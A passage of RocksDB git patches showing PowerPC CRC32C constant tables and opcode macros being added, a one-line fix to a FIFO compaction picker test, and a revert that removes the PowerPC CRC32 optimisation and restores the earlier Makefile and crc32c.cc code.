+ + /* x^47104 mod p(x)` << 1, x^47168 mod p(x)` << 1 */ + .octa 0x00000001b42e8ad60000000039f40a00 + + /* x^46080 mod p(x)` << 1, x^46144 mod p(x)` << 1 */ + .octa 0x00000000142a983800000000bd4c10c4 + + /* x^45056 mod p(x)` << 1, x^45120 mod p(x)` << 1 */ + .octa 0x0000000109c7f1900000000042db1d98 + + /* x^44032 mod p(x)` << 1, x^44096 mod p(x)` << 1 */ + .octa 0x0000000056ff931000000001c905bae6 + + /* x^43008 mod p(x)` << 1, x^43072 mod p(x)` << 1 */ + .octa 0x00000001594513aa00000000069d40ea + + /* x^41984 mod p(x)` << 1, x^42048 mod p(x)` << 1 */ + .octa 0x00000001e3b5b1e8000000008e4fbad0 + + /* x^40960 mod p(x)` << 1, x^41024 mod p(x)` << 1 */ + .octa 0x000000011dd5fc080000000047bedd46 + + /* x^39936 mod p(x)` << 1, x^40000 mod p(x)` << 1 */ + .octa 0x00000001675f0cc20000000026396bf8 + + /* x^38912 mod p(x)` << 1, x^38976 mod p(x)` << 1 */ + .octa 0x00000000d1c8dd4400000000379beb92 + + /* x^37888 mod p(x)` << 1, x^37952 mod p(x)` << 1 */ + .octa 0x0000000115ebd3d8000000000abae54a + + /* x^36864 mod p(x)` << 1, x^36928 mod p(x)` << 1 */ + .octa 0x00000001ecbd0dac0000000007e6a128 + + /* x^35840 mod p(x)` << 1, x^35904 mod p(x)` << 1 */ + .octa 0x00000000cdf67af2000000000ade29d2 + + /* x^34816 mod p(x)` << 1, x^34880 mod p(x)` << 1 */ + .octa 0x000000004c01ff4c00000000f974c45c + + /* x^33792 mod p(x)` << 1, x^33856 mod p(x)` << 1 */ + .octa 0x00000000f2d8657e00000000e77ac60a + + /* x^32768 mod p(x)` << 1, x^32832 mod p(x)` << 1 */ + .octa 0x000000006bae74c40000000145895816 + + /* x^31744 mod p(x)` << 1, x^31808 mod p(x)` << 1 */ + .octa 0x0000000152af8aa00000000038e362be + + /* x^30720 mod p(x)` << 1, x^30784 mod p(x)` << 1 */ + .octa 0x0000000004663802000000007f991a64 + + /* x^29696 mod p(x)` << 1, x^29760 mod p(x)` << 1 */ + .octa 0x00000001ab2f5afc00000000fa366d3a + + /* x^28672 mod p(x)` << 1, x^28736 mod p(x)` << 1 */ + .octa 0x0000000074a4ebd400000001a2bb34f0 + + /* x^27648 mod p(x)` << 1, x^27712 mod p(x)` << 1 */ + .octa 0x00000001d7ab3a4c0000000028a9981e + + /* x^26624 mod p(x)` << 1, x^26688 mod p(x)` << 1 */ + .octa 0x00000001a8da60c600000001dbc672be + + /* x^25600 mod p(x)` << 1, x^25664 mod p(x)` << 1 */ + .octa 0x000000013cf6382000000000b04d77f6 + + /* x^24576 mod p(x)` << 1, x^24640 mod p(x)` << 1 */ + .octa 0x00000000bec12e1e0000000124400d96 + + /* x^23552 mod p(x)` << 1, x^23616 mod p(x)` << 1 */ + .octa 0x00000001c6368010000000014ca4b414 + + /* x^22528 mod p(x)` << 1, x^22592 mod p(x)` << 1 */ + .octa 0x00000001e6e78758000000012fe2c938 + + /* x^21504 mod p(x)` << 1, x^21568 mod p(x)` << 1 */ + .octa 0x000000008d7f2b3c00000001faed01e6 + + /* x^20480 mod p(x)` << 1, x^20544 mod p(x)` << 1 */ + .octa 0x000000016b4a156e000000007e80ecfe + + /* x^19456 mod p(x)` << 1, x^19520 mod p(x)` << 1 */ + .octa 0x00000001c63cfeb60000000098daee94 + + /* x^18432 mod p(x)` << 1, x^18496 mod p(x)` << 1 */ + .octa 0x000000015f902670000000010a04edea + + /* x^17408 mod p(x)` << 1, x^17472 mod p(x)` << 1 */ + .octa 0x00000001cd5de11e00000001c00b4524 + + /* x^16384 mod p(x)` << 1, x^16448 mod p(x)` << 1 */ + .octa 0x000000001acaec540000000170296550 + + /* x^15360 mod p(x)` << 1, x^15424 mod p(x)` << 1 */ + .octa 0x000000002bd0ca780000000181afaa48 + + /* x^14336 mod p(x)` << 1, x^14400 mod p(x)` << 1 */ + .octa 0x0000000032d63d5c0000000185a31ffa + + /* x^13312 mod p(x)` << 1, x^13376 mod p(x)` << 1 */ + .octa 0x000000001c6d4e4c000000002469f608 + + /* x^12288 mod p(x)` << 1, x^12352 mod p(x)` << 1 */ + .octa 0x0000000106a60b92000000006980102a + + /* x^11264 mod p(x)` << 1, x^11328 mod p(x)` << 1 */ + .octa 0x00000000d3855e120000000111ea9ca8 + + /* x^10240 mod p(x)` << 1, x^10304 mod p(x)` << 1 */ + .octa 0x00000000e312563600000001bd1d29ce + + /* x^9216 mod p(x)` << 1, x^9280 mod p(x)` << 1 */ + .octa 0x000000009e8f7ea400000001b34b9580 + + /* x^8192 mod p(x)` << 1, x^8256 mod p(x)` << 1 */ + .octa 0x00000001c82e562c000000003076054e + + /* x^7168 mod p(x)` << 1, x^7232 mod p(x)` << 1 */ + .octa 0x00000000ca9f09ce000000012a608ea4 + + /* x^6144 mod p(x)` << 1, x^6208 mod p(x)` << 1 */ + .octa 0x00000000c63764e600000000784d05fe + + /* x^5120 mod p(x)` << 1, x^5184 mod p(x)` << 1 */ + .octa 0x0000000168d2e49e000000016ef0d82a + + /* x^4096 mod p(x)` << 1, x^4160 mod p(x)` << 1 */ + .octa 0x00000000e986c1480000000075bda454 + + /* x^3072 mod p(x)` << 1, x^3136 mod p(x)` << 1 */ + .octa 0x00000000cfb65894000000003dc0a1c4 + + /* x^2048 mod p(x)` << 1, x^2112 mod p(x)` << 1 */ + .octa 0x0000000111cadee400000000e9a5d8be + + /* x^1024 mod p(x)` << 1, x^1088 mod p(x)` << 1 */ + .octa 0x0000000171fb63ce00000001609bc4b4 + + .short_constants : + + /* Reduce final 1024-2048 bits to 64 bits, shifting 32 bits to include the + trailing 32 bits of zeros */ + /* x^1952 mod p(x)`, x^1984 mod p(x)`, x^2016 mod p(x)`, x^2048 mod p(x)` */ + .octa 0x7fec2963e5bf80485cf015c388e56f72 + + /* x^1824 mod p(x)`, x^1856 mod p(x)`, x^1888 mod p(x)`, x^1920 mod p(x)` */ + .octa 0x38e888d4844752a9963a18920246e2e6 + + /* x^1696 mod p(x)`, x^1728 mod p(x)`, x^1760 mod p(x)`, x^1792 mod p(x)` */ + .octa 0x42316c00730206ad419a441956993a31 + + /* x^1568 mod p(x)`, x^1600 mod p(x)`, x^1632 mod p(x)`, x^1664 mod p(x)` */ + .octa 0x543d5c543e65ddf9924752ba2b830011 + + /* x^1440 mod p(x)`, x^1472 mod p(x)`, x^1504 mod p(x)`, x^1536 mod p(x)` */ + .octa 0x78e87aaf56767c9255bd7f9518e4a304 + + /* x^1312 mod p(x)`, x^1344 mod p(x)`, x^1376 mod p(x)`, x^1408 mod p(x)` */ + .octa 0x8f68fcec1903da7f6d76739fe0553f1e + + /* x^1184 mod p(x)`, x^1216 mod p(x)`, x^1248 mod p(x)`, x^1280 mod p(x)` */ + .octa 0x3f4840246791d588c133722b1fe0b5c3 + + /* x^1056 mod p(x)`, x^1088 mod p(x)`, x^1120 mod p(x)`, x^1152 mod p(x)` */ + .octa 0x34c96751b04de25a64b67ee0e55ef1f3 + + /* x^928 mod p(x)`, x^960 mod p(x)`, x^992 mod p(x)`, x^1024 mod p(x)` */ + .octa 0x156c8e180b4a395b069db049b8fdb1e7 + + /* x^800 mod p(x)`, x^832 mod p(x)`, x^864 mod p(x)`, x^896 mod p(x)` */ + .octa 0xe0b99ccbe661f7bea11bfaf3c9e90b9e + + /* x^672 mod p(x)`, x^704 mod p(x)`, x^736 mod p(x)`, x^768 mod p(x)` */ + .octa 0x041d37768cd75659817cdc5119b29a35 + + /* x^544 mod p(x)`, x^576 mod p(x)`, x^608 mod p(x)`, x^640 mod p(x)` */ + .octa 0x3a0777818cfaa9651ce9d94b36c41f1c + + /* x^416 mod p(x)`, x^448 mod p(x)`, x^480 mod p(x)`, x^512 mod p(x)` */ + .octa 0x0e148e8252377a554f256efcb82be955 + + /* x^288 mod p(x)`, x^320 mod p(x)`, x^352 mod p(x)`, x^384 mod p(x)` */ + .octa 0x9c25531d19e65ddeec1631edb2dea967 + + /* x^160 mod p(x)`, x^192 mod p(x)`, x^224 mod p(x)`, x^256 mod p(x)` */ + .octa 0x790606ff9957c0a65d27e147510ac59a + + /* x^32 mod p(x)`, x^64 mod p(x)`, x^96 mod p(x)`, x^128 mod p(x)` */ + .octa 0x82f63b786ea2d55ca66805eb18b8ea18 + + .barrett_constants : + /* 33 bit reflected Barrett constant m - (4^32)/n */ + .octa 0x000000000000000000000000dea713f1 /* x^64 div p(x)` */ + /* 33 bit reflected Barrett constant n */ + .octa 0x00000000000000000000000105ec76f1 +#endif + +#endif diff --git a/util/ppc-opcode.h b/util/ppc-opcode.h new file mode 100644 index 00000000000..eeb0ae08ffc --- /dev/null +++ b/util/ppc-opcode.h @@ -0,0 +1,31 @@ +// Copyright (c) 2017 International Business Machines Corp. +// All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. +// This source code is also licensed under the GPLv2 license found in the +// COPYING file in the root directory of this source tree. + +#ifndef __OPCODES_H +#define __OPCODES_H + +#define __PPC_RA(a) (((a)&0x1f) << 16) +#define __PPC_RB(b) (((b)&0x1f) << 11) +#define __PPC_XA(a) ((((a)&0x1f) << 16) | (((a)&0x20) >> 3)) +#define __PPC_XB(b) ((((b)&0x1f) << 11) | (((b)&0x20) >> 4)) +#define __PPC_XS(s) ((((s)&0x1f) << 21) | (((s)&0x20) >> 5)) +#define __PPC_XT(s) __PPC_XS(s) +#define VSX_XX3(t, a, b) (__PPC_XT(t) | __PPC_XA(a) | __PPC_XB(b)) +#define VSX_XX1(s, a, b) (__PPC_XS(s) | __PPC_RA(a) | __PPC_RB(b)) + +#define PPC_INST_VPMSUMW 0x10000488 +#define PPC_INST_VPMSUMD 0x100004c8 +#define PPC_INST_MFVSRD 0x7c000066 +#define PPC_INST_MTVSRD 0x7c000166 + +#define VPMSUMW(t, a, b) .long PPC_INST_VPMSUMW | VSX_XX3((t), a, b) +#define VPMSUMD(t, a, b) .long PPC_INST_VPMSUMD | VSX_XX3((t), a, b) +#define MFVRD(a, t) .long PPC_INST_MFVSRD | VSX_XX1((t) + 32, a, 0) +#define MTVRD(t, a) .long PPC_INST_MTVSRD | VSX_XX1((t) + 32, a, 0) + +#endif From 9980de262c932e273965586f6268f7d9b561bcee Mon Sep 17 00:00:00 2001 From: Sagar Vemuri Date: Wed, 26 Jul 2017 12:08:31 -0700 Subject: [PATCH 045/205] Fix FIFO compaction picker test Summary: A FIFO compaction picker test is accidentally testing against an instance of level compaction picker. Closes https://github.com/facebook/rocksdb/pull/2641 Differential Revision: D5495390 Pulled By: sagar0 fbshipit-source-id: 301962736f629b1c499570fb504cdbe66bacb46f --- db/compaction_picker_test.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index c2bff0024f4..bba2d073d88 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -512,7 +512,7 @@ TEST_F(CompactionPickerTest, NeedsCompactionFIFO) { kFileSize, 0, i * 100, i * 100 + 99); current_size += kFileSize; UpdateVersionStorageInfo(); - ASSERT_EQ(level_compaction_picker.NeedsCompaction(vstorage_.get()), + ASSERT_EQ(fifo_compaction_picker.NeedsCompaction(vstorage_.get()), vstorage_->CompactionScore(0) >= 1); } } From c281b44829ac87ce3349804eba2456be0a604dcb Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Wed, 26 Jul 2017 19:00:42 -0700 Subject: [PATCH 046/205] Revert "CRC32 Power Optimization Changes" Summary: This reverts commit 2289d381153890e715718f6215909bdfc0e1224c. Closes https://github.com/facebook/rocksdb/pull/2652 Differential Revision: D5506163 Pulled By: siying fbshipit-source-id: 105e31dd9d99090453a6b9f32c165206cd3affa3 --- Makefile | 77 +--- db/db_test_util.cc | 7 +- src.mk | 10 - tools/db_stress.cc | 16 +- util/crc32c.cc | 69 +-- util/crc32c_ppc.c | 95 ---- util/crc32c_ppc.h | 23 - util/crc32c_ppc_asm.S | 753 ------------------------------ util/crc32c_ppc_constants.h | 893 ------------------------------------ util/ppc-opcode.h | 31 -- 10 files changed, 25 insertions(+), 1949 deletions(-) delete mode 100644 util/crc32c_ppc.c delete mode 100644 util/crc32c_ppc.h delete mode 100644 util/crc32c_ppc_asm.S delete mode 100644 util/crc32c_ppc_constants.h delete mode 100644 util/ppc-opcode.h diff --git a/Makefile b/Makefile index c89e3a20449..c40d741d7a8 100644 --- a/Makefile +++ b/Makefile @@ -96,18 +96,6 @@ OPT += -momit-leaf-frame-pointer endif endif -ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) -CXXFLAGS += -DHAS_ALTIVEC -CFLAGS += -DHAS_ALTIVEC -HAS_ALTIVEC=1 -endif - -ifeq (,$(shell $(CXX) -fsyntax-only -mcpu=power8 -xc /dev/null 2>&1)) -CXXFLAGS += -DHAVE_POWER8 -CFLAGS += -DHAVE_POWER8 -HAVE_POWER8=1 -endif - # if we're compiling for release, compile without debug code (-DNDEBUG) and # don't treat warnings as errors ifeq ($(DEBUG_LEVEL),0) @@ -317,9 +305,9 @@ util/build_version.cc: FORCE else mv -f $@-t $@; fi endif -LIBOBJECTS = $(LIB_SOURCES:.cc=.cc.o) $(LIB_SOURCES_C:.c=.c.o) $(LIB_SOURCES_ASM:.S=.S.o) -LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.cc.o) -MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.cc.o) +LIBOBJECTS = $(LIB_SOURCES:.cc=.o) +LIBOBJECTS += $(TOOL_LIB_SOURCES:.cc=.o) +MOCKOBJECTS = $(MOCK_LIB_SOURCES:.cc=.o) GTEST = $(GTEST_DIR)/gtest/gtest-all.o TESTUTIL = ./util/testutil.o @@ -567,27 +555,14 @@ $(SHARED2): $(SHARED4) $(SHARED3): $(SHARED4) ln -fs $(SHARED4) $(SHARED3) endif -SHARED_CC_OBJECTS = $(LIB_SOURCES:.cc=.cc.o) -SHARED_C_OBJECTS = $(LIB_SOURCES_C:.c=.c.o) -SHARED_ASM_OBJECTS = $(LIB_SOURCES_ASM:.S=.S.o) -SHARED_CC_LIBOBJECTS = $(patsubst %.cc.o,shared-objects/%.cc.o,$(SHARED_CC_OBJECTS)) -SHARED_C_LIBOBJECTS = $(patsubst %.c.o,shared-objects/%.c.o,$(SHARED_C_OBJECTS)) -SHARED_ASM_LIBOBJECTS = $(patsubst %.S.o,shared-objects/%.S.o,$(SHARED_ASM_OBJECTS)) - -shared_libobjects = $(SHARED_CC_LIBOBJECTS) $(SHARED_C_LIBOBJECTS) $(SHARED_ASM_LIBOBJECTS) +shared_libobjects = $(patsubst %,shared-objects/%,$(LIBOBJECTS)) CLEAN_FILES += shared-objects -$(SHARED_CC_LIBOBJECTS): shared-objects/%.cc.o: %.cc - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ - -$(SHARED_C_LIBOBJECTS): shared-objects/%.c.o: %.c +$(shared_libobjects): shared-objects/%.o: %.cc $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ -$(SHARED_ASM_LIBOBJECTS): shared-objects/%.S.o: %.S - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) -c $< -o $@ - -$(SHARED4): $(shared_libobjects) +$(SHARED4): $(shared_libobjects) $(CXX) $(PLATFORM_SHARED_LDFLAGS)$(SHARED3) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) $(shared_libobjects) $(LDFLAGS) -o $@ endif # PLATFORM_SHARED_EXT @@ -1667,26 +1642,12 @@ rocksdbjavastaticpublishcentral: mvn gpg:sign-and-deploy-file -Durl=https://oss.sonatype.org/service/local/staging/deploy/maven2/ -DrepositoryId=sonatype-nexus-staging -DpomFile=java/rocksjni.pom -Dfile=java/target/rocksdbjni-$(ROCKSDB_MAJOR).$(ROCKSDB_MINOR).$(ROCKSDB_PATCH).jar # A version of each $(LIBOBJECTS) compiled with -fPIC -JAVA_CC_OBJECTS = $(SHARED_CC_OBJECTS) -JAVA_C_OBJECTS = $(SHARED_C_OBJECTS) -JAVA_ASM_OBJECTS = $(SHARED_ASM_OBJECTS) - -JAVA_CC_LIBOBJECTS = $(patsubst %.cc.o,jl/%.cc.o,$(JAVA_CC_OBJECTS)) -JAVA_C_LIBOBJECTS = $(patsubst %.c.o,jl/%.c.o,$(JAVA_C_OBJECTS)) -JAVA_ASM_LIBOBJECTS = $(patsubst %.S.o,jl/%.S.o,$(JAVA_ASM_OBJECTS)) -java_libobjects = $(JAVA_CC_LIBOBJECTS) $(JAVA_C_LIBOBJECTS) $(JAVA_ASM_LIBOBJECTS) +java_libobjects = $(patsubst %,jl/%,$(LIBOBJECTS)) CLEAN_FILES += jl -$(JAVA_CC_LIBOBJECTS): jl/%.cc.o: %.cc - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) - -$(JAVA_C_LIBOBJECTS): jl/%.c.o: %.c - $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) - -$(JAVA_ASM_LIBOBJECTS): jl/%.S.o: %.S +$(java_libobjects): jl/%.o: %.cc $(AM_V_CC)mkdir -p $(@D) && $(CXX) $(CXXFLAGS) -fPIC -c $< -o $@ $(COVERAGEFLAGS) - rocksdbjava: $(java_libobjects) $(AM_V_GEN)cd java;$(MAKE) javalib; $(AM_V_at)rm -f ./java/target/$(ROCKSDBJNILIB) @@ -1742,24 +1703,19 @@ IOSVERSION=$(shell defaults read $(PLATFORMSROOT)/iPhoneOS.platform/version CFBu lipo ios-x86/$@ ios-arm/$@ -create -output $@ else -%.cc.o: %.cc +.cc.o: $(AM_V_CC)$(CXX) $(CXXFLAGS) -c $< -o $@ $(COVERAGEFLAGS) -%.c.o: %.c - $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ - -%.S.o: %.S +.c.o: $(AM_V_CC)$(CC) $(CFLAGS) -c $< -o $@ - endif + # --------------------------------------------------------------------------- # Source files dependencies detection # --------------------------------------------------------------------------- all_sources = $(LIB_SOURCES) $(MAIN_SOURCES) $(MOCK_LIB_SOURCES) $(TOOL_LIB_SOURCES) $(BENCH_LIB_SOURCES) $(TEST_LIB_SOURCES) $(EXP_LIB_SOURCES) DEPFILES = $(all_sources:.cc=.d) -DEPFILES_C = $(LIB_SOURCES_C:.c=.d) -DEPFILES_ASM = $(LIB_SOURCES_ASM:.S=.d) # Add proper dependency support so changing a .h file forces a .cc file to # rebuild. @@ -1770,16 +1726,7 @@ $(DEPFILES): %.d: %.cc @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ -MM -MT'$@' -MT'$(<:.cc=.o)' "$<" -o '$@' -$(DEPFILES_C): %.d: %.c - @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ - -MM -MT'$@' -MT'$(<:.c=.o)' "$<" -o '$@' - -$(DEPFILES_ASM): %.d: %.S - @$(CXX) $(CXXFLAGS) $(PLATFORM_SHARED_CFLAGS) \ - -MM -MT'$@' -MT'$(<:.S=.o)' "$<" -o '$@' - - -depend: $(DEPFILES) $(DEPFILES_C) $(DEPFILES_ASM) +depend: $(DEPFILES) # if the make goal is either "clean" or "format", we shouldn't # try to import the *.d files. diff --git a/db/db_test_util.cc b/db/db_test_util.cc index 98b6b471e70..5ca4b19a253 100644 --- a/db/db_test_util.cc +++ b/db/db_test_util.cc @@ -277,11 +277,12 @@ Options DBTestBase::GetOptions( Options options = default_options; BlockBasedTableOptions table_options; bool set_block_based_table_factory = true; -#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ - !defined(OS_AIX) +#if !defined(OS_MACOSX) && !defined(OS_WIN) && !defined(OS_SOLARIS) && \ + !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->ClearCallBack( "NewRandomAccessFile:O_DIRECT"); - rocksdb::SyncPoint::GetInstance()->ClearCallBack("NewWritableFile:O_DIRECT"); + rocksdb::SyncPoint::GetInstance()->ClearCallBack( + "NewWritableFile:O_DIRECT"); #endif bool can_allow_mmap = IsMemoryMappedAccessSupported(); diff --git a/src.mk b/src.mk index 39b1ed4895f..fb7f979396c 100644 --- a/src.mk +++ b/src.mk @@ -204,16 +204,6 @@ LIB_SOURCES = \ utilities/write_batch_with_index/write_batch_with_index.cc \ utilities/write_batch_with_index/write_batch_with_index_internal.cc \ -ifeq (,$(shell $(CXX) -fsyntax-only -maltivec -xc /dev/null 2>&1)) -LIB_SOURCES_ASM =\ - util/crc32c_ppc_asm.S -LIB_SOURCES_C = \ - util/crc32c_ppc.c -else -LIB_SOURCES_ASM = -LIB_SOURCES_C = -endif - TOOL_LIB_SOURCES = \ tools/ldb_cmd.cc \ tools/ldb_tool.cc \ diff --git a/tools/db_stress.cc b/tools/db_stress.cc index b5d0c7589d8..db905f0c887 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -2370,15 +2370,15 @@ int main(int argc, char** argv) { #if !defined(NDEBUG) && !defined(OS_MACOSX) && !defined(OS_WIN) && \ !defined(OS_SOLARIS) && !defined(OS_AIX) rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewWritableFile:O_DIRECT", [&](void* arg) { - int* val = static_cast(arg); - *val &= ~O_DIRECT; - }); + "NewWritableFile:O_DIRECT", [&](void* arg) { + int* val = static_cast(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->SetCallBack( - "NewRandomAccessFile:O_DIRECT", [&](void* arg) { - int* val = static_cast(arg); - *val &= ~O_DIRECT; - }); + "NewRandomAccessFile:O_DIRECT", [&](void* arg) { + int* val = static_cast(arg); + *val &= ~O_DIRECT; + }); rocksdb::SyncPoint::GetInstance()->EnableProcessing(); #endif diff --git a/util/crc32c.cc b/util/crc32c.cc index 9b78c92f181..ae36f82305b 100644 --- a/util/crc32c.cc +++ b/util/crc32c.cc @@ -18,32 +18,9 @@ #endif #include "util/coding.h" -#ifdef __powerpc64__ -#include "util/crc32c_ppc.h" -#include "util/crc32c_ppc_constants.h" - -#if __linux__ -#include - -#ifndef PPC_FEATURE2_VEC_CRYPTO -#define PPC_FEATURE2_VEC_CRYPTO 0x02000000 -#endif - -#ifndef AT_HWCAP2 -#define AT_HWCAP2 26 -#endif - -#endif /* __linux__ */ - -#endif - namespace rocksdb { namespace crc32c { -#ifdef __powerpc64__ -static int arch_ppc_crc32 = 0; -#endif - static const uint32_t table0_[256] = { 0x00000000, 0xf26b8303, 0xe13b70f7, 0x1350f3f4, 0xc79a971f, 0x35f1141c, 0x26a1e7e8, 0xd4ca64eb, @@ -394,7 +371,6 @@ uint32_t ExtendImpl(uint32_t crc, const char* buf, size_t size) { } // Detect if SS42 or not. -#ifndef HAVE_POWER8 static bool isSSE42() { #ifndef HAVE_SSE42 return false; @@ -411,58 +387,15 @@ static bool isSSE42() { return false; #endif } -#endif typedef uint32_t (*Function)(uint32_t, const char*, size_t); -#if defined(HAVE_POWER8) && defined(HAS_ALTIVEC) -uint32_t ExtendPPCImpl(uint32_t crc, const char *buf, size_t size) { - return crc32c_ppc(crc, (const unsigned char *)buf, size); -} - -#if __linux__ -static int arch_ppc_probe(void) { - arch_ppc_crc32 = 0; - -#if defined(__powerpc64__) - if (getauxval(AT_HWCAP2) & PPC_FEATURE2_VEC_CRYPTO) arch_ppc_crc32 = 1; -#endif /* __powerpc64__ */ - - return arch_ppc_crc32; -} -#endif // __linux__ - -static bool isAltiVec() { - if (arch_ppc_probe()) { - return true; - } else { - return false; - } -} -#endif - static inline Function Choose_Extend() { -#ifndef HAVE_POWER8 return isSSE42() ? ExtendImpl : ExtendImpl; -#else - return isAltiVec() ? ExtendPPCImpl : ExtendImpl; -#endif } bool IsFastCrc32Supported() { - bool has_fast_crc = false; -#ifdef HAVE_POWER8 -#ifdef HAS_ALTIVEC - if (arch_ppc_probe()) { - has_fast_crc = true; - } -#else - has_fast_crc = false; -#endif -#else - has_fast_crc = isSSE42(); -#endif - return has_fast_crc; + return isSSE42(); } Function ChosenExtend = Choose_Extend(); diff --git a/util/crc32c_ppc.c b/util/crc32c_ppc.c deleted file mode 100644 index 3c517c88ca1..00000000000 --- a/util/crc32c_ppc.c +++ /dev/null @@ -1,95 +0,0 @@ -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#define CRC_TABLE -#include -#include -#include -#include "util/crc32c_ppc_constants.h" - -#define VMX_ALIGN 16 -#define VMX_ALIGN_MASK (VMX_ALIGN - 1) - -#ifdef REFLECT -static unsigned int crc32_align(unsigned int crc, unsigned char const *p, - unsigned long len) { - while (len--) crc = crc_table[(crc ^ *p++) & 0xff] ^ (crc >> 8); - return crc; -} -#endif - -#ifdef HAVE_POWER8 -unsigned int __crc32_vpmsum(unsigned int crc, unsigned char const *p, - unsigned long len); - -static uint32_t crc32_vpmsum(uint32_t crc, unsigned char const *data, - unsigned len) { - unsigned int prealign; - unsigned int tail; - -#ifdef CRC_XOR - crc ^= 0xffffffff; -#endif - - if (len < VMX_ALIGN + VMX_ALIGN_MASK) { - crc = crc32_align(crc, data, (unsigned long)len); - goto out; - } - - if ((unsigned long)data & VMX_ALIGN_MASK) { - prealign = VMX_ALIGN - ((unsigned long)data & VMX_ALIGN_MASK); - crc = crc32_align(crc, data, prealign); - len -= prealign; - data += prealign; - } - - crc = __crc32_vpmsum(crc, data, (unsigned long)len & ~VMX_ALIGN_MASK); - - tail = len & VMX_ALIGN_MASK; - if (tail) { - data += len & ~VMX_ALIGN_MASK; - crc = crc32_align(crc, data, tail); - } - -out: -#ifdef CRC_XOR - crc ^= 0xffffffff; -#endif - - return crc; -} - -/* This wrapper function works around the fact that crc32_vpmsum - * does not gracefully handle the case where the data pointer is NULL. There - * may be room for performance improvement here. - */ -uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { - unsigned char *buf2; - - if (!data) { - buf2 = (unsigned char *)malloc(len); - bzero(buf2, len); - crc = crc32_vpmsum(crc, buf2, len); - free(buf2); - } else { - crc = crc32_vpmsum(crc, data, (unsigned long)len); - } - return crc; -} - -#else /* HAVE_POWER8 */ - -/* This symbol has to exist on non-ppc architectures (and on legacy - * ppc systems using power7 or below) in order to compile properly - * there, even though it won't be called. - */ -uint32_t crc32c_ppc(uint32_t crc, unsigned char const *data, unsigned len) { - return 0; -} - -#endif /* HAVE_POWER8 */ diff --git a/util/crc32c_ppc.h b/util/crc32c_ppc.h deleted file mode 100644 index b52ad9b2a42..00000000000 --- a/util/crc32c_ppc.h +++ /dev/null @@ -1,23 +0,0 @@ -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#ifndef CRC32C_PPC_H -#define CRC32C_PPC_H - -#ifdef __cplusplus -extern "C" { -#endif - -extern uint32_t crc32c_ppc(uint32_t crc, unsigned char const *buffer, - unsigned len); - -#ifdef __cplusplus -} -#endif - -#endif diff --git a/util/crc32c_ppc_asm.S b/util/crc32c_ppc_asm.S deleted file mode 100644 index 6de79797335..00000000000 --- a/util/crc32c_ppc_asm.S +++ /dev/null @@ -1,753 +0,0 @@ -// Copyright (c) 2015 Anton Blanchard , IBM -// Copyright (c) 2017 International Business Machines Corp. -// All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. - -#include -#include "ppc-opcode.h" - -#undef toc - -#ifndef r1 -#define r1 1 -#endif - -#ifndef r2 -#define r2 2 -#endif - - .section .rodata -.balign 16 - -.byteswap_constant: - /* byte reverse permute constant */ - .octa 0x0F0E0D0C0B0A09080706050403020100 - -#define __ASSEMBLY__ -#include "crc32c_ppc_constants.h" - - .text - -#if defined(__BIG_ENDIAN__) && defined(REFLECT) -#define BYTESWAP_DATA -#elif defined(__LITTLE_ENDIAN__) && !defined(REFLECT) -#define BYTESWAP_DATA -#else -#undef BYTESWAP_DATA -#endif - -#define off16 r25 -#define off32 r26 -#define off48 r27 -#define off64 r28 -#define off80 r29 -#define off96 r30 -#define off112 r31 - -#define const1 v24 -#define const2 v25 - -#define byteswap v26 -#define mask_32bit v27 -#define mask_64bit v28 -#define zeroes v29 - -#ifdef BYTESWAP_DATA -#define VPERM(A, B, C, D) vperm A, B, C, D -#else -#define VPERM(A, B, C, D) -#endif - -/* unsigned int __crc32_vpmsum(unsigned int crc, void *p, unsigned long len) */ -FUNC_START(__crc32_vpmsum) - std r31,-8(r1) - std r30,-16(r1) - std r29,-24(r1) - std r28,-32(r1) - std r27,-40(r1) - std r26,-48(r1) - std r25,-56(r1) - - li off16,16 - li off32,32 - li off48,48 - li off64,64 - li off80,80 - li off96,96 - li off112,112 - li r0,0 - - /* Enough room for saving 10 non volatile VMX registers */ - subi r6,r1,56+10*16 